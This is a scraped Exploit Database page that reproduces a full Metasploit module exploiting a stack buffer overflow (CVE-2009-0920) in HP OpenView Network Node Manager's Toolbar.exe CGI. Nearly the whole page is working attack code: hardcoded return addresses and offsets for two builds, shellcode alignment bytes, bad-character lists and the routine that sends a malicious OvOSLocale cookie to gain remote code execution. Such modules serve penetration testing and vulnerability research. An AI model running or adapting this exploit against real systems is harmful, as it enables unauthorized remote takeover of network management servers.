HP OpenView Network Node Manager (OV NNM) – ‘Toolbar.exe’ CGI Cookie Handling Buffer Overflow (Metasploit)

• Exploit Database
• 126 阅读

• 作者： Metasploit
  日期： 2011-07-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17537/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166

  ## # $Id: hp_nnm_toolbar_02.rb 13194 2011-07-16 05:21:20Z sinn3r $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53.By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code.Please note that this module only works against a specific build (ie. NNM 7.53_01195) }, &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 13194 $&apos;, &apos;Author&apos; => [ &apos;Oren Isacson&apos;, # original discovery &apos;juan vazquez&apos;, # metasploit module (7.0 target) &apos;sinn3r&apos;, # 7.53_01195 target ], &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2009-0920&apos; ], [ &apos;OSVDB&apos;, &apos;53242&apos; ], [ &apos;BID&apos;, &apos;34294&apos; ], [ &apos;URL&apos;, &apos;http://www.coresecurity.com/content/openview-buffer-overflows&apos;] ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, }, &apos;Privileged&apos; => false, &apos;Payload&apos;=> { &apos;Space&apos;=> 4000, &apos;BadChars&apos; => "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f\x3b\x2b", &apos;DisableNops&apos;=> true, # no need &apos;EncoderType&apos;=> Msf::Encoder::Type::AlphanumMixed, &apos;EncoderOptions&apos; => { &apos;BufferRegister&apos; => &apos;EDX&apos; } }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ #Windows XP SP3 &apos;HP OpenView Network Node Manager Release B.07.00&apos;, { &apos;Ret&apos; => 0x5A212147, # ovsnmp.dll call esp &apos;Offset&apos; => 0xFC,# until EIP # Pointer to string with length < 0x100 # Avoid crash before vulnerable function returns # And should work as a "NOP" since it will prepend shellcode #&apos;ReadAddress&apos; => 0x5A03A225,# ov.dll &apos;ReadAddress&apos; => 0x5A03A225,# ov.dll &apos;EDXAdjust&apos; => 0x17, # 0x8 => offset until "0x90" nops # 0x4 => "0x90" nops # 0x2 => len(push esp, pop edx) # 0x3 => len(sub) # 0x6 => len(add) } ], [ #Windows Server 2003 &apos;HP OpenView Network Node Manager 7.53 Patch 01195&apos;, { &apos;Eax&apos; => 0x5a456eac, #Readable address for CMP BYTE PTR DS:[EAX],0 &apos;EaxOffset&apos; => 251,#Offset to overwrite EAX &apos;Ret&apos; => 0x5A23377C, #CALL EDI &apos;Max&apos; => 8000, #Max buffer size } ] ], &apos;DisclosureDate&apos; => &apos;Jan 21 2009&apos;))   register_options( [ Opt::RPORT(80) ], self.class ) end   def exploit   if target.name =~ /7\.53/   #EDX alignment for alphanumeric shellcode #payload is in EDI first.We exchange it with EDX, align EDX, and then #jump to it. align= "\x87\xfa"#xchg edi,edx align << "\x80\xc2\x27"#add dl,0x27 align << "\xff\xe2"#jmp edx   #Add the alignment code to payload p = align + payload.encoded   sploit= &apos;en_US&apos; sploit << rand_text_alphanumeric(247) sploit << [target.ret].pack(&apos;V*&apos;) sploit << rand_text_alphanumeric(target[&apos;EaxOffset&apos;]-sploit.length+&apos;en_US&apos;.length) sploit << [target[&apos;Eax&apos;]].pack(&apos;V*&apos;) sploit << rand_text_alphanumeric(3200) sploit << make_nops(100 - align.length) sploit << align sploit << p sploit << rand_text_alphanumeric(target[&apos;Max&apos;]-sploit.length)   elsif target.name =~ /B\.07\.00/   edx = Rex::Arch::X86::EDX   sploit = "en_US" sploit << rand_text_alphanumeric(target[&apos;Offset&apos;] - "en_US".length, payload_badchars) sploit << [target.ret].pack(&apos;V&apos;) sploit << [target[&apos;ReadAddress&apos;]].pack(&apos;V&apos;) sploit << "\x90\x90\x90\x90" # Get in EDX a pointer to the shellcode start sploit << "\x54" # push esp sploit << "\x5A" # pop edx sploit << Rex::Arch::X86.sub(-(target[&apos;EDXAdjust&apos;]), edx, payload_badchars, false, true) sploit << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000 sploit << payload.encoded   end   #Send the malicious request to /OvCgi/ToolBar.exe #If the buffer contains a badchar, NNM 7.53 will return a "400 Bad Request". #If the exploit causes ToolBar.exe to crash, NNM returns "error in CGI Application" send_request_raw({ &apos;uri&apos; => "/OvCgi/Toolbar.exe", &apos;method&apos;=> "GET", &apos;cookie&apos;=> "OvOSLocale=" + sploit + "; OvAcceptLang=en-usa", }, 20)   handler disconnect end   end     =begin NNM B.07.00&apos;s badchar set: 00 0D 0A 20 3B 3D 2C 2B   NNM 7.53_01195&apos;s badchar set: 01 02 03 04 05 06 07 08 0a 0b 0c 0d 0e 0f 10 11................ 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f ............... 3b = delimiter 2b = gets converted to 0x2b =end